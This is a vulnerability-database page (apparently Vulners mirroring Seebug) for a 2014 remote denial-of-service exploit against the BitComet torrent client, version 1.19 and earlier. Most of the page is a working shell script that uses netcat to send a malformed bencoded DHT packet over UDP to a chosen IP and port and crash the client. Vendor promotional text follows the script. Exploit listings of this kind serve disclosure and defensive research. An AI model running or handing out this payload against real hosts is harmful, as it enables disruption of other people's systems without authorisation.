Lucene search
K

BitComet <= 1.19 Remote DoS Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 13 Views

BitComet <= 1.19 Remote DoS Exploit. Remote denial of service (DOS) vulnerability in BitComet version 1.19 allows attackers to crash the client by sending a malicious DHT packet with an invalid bencoded message

Code

                                                #!/bin/sh
#
# BitComet &#60;= 1.19 Remote DOS Exploit
# Pierre Nogues - http://www.indahax.com/
#
# Description:
#     BitComet is a torrent client
#
#     BitComet doesn&#39;t handle malicious DHT packet with an invalid bencoded message.
#
# Affected versions :
#     BitComet &#60;= 1.19
#
# Plateforms :
#     Windows
#
# Usage :
#     ./exploit.sh ip port

if [ $# -ne 2 ]; then
     echo &#34;./exploit.sh ip port&#34;
     exit 1
fi

nc -u $1 $2 &#60;&#60; .
d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee
.

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
13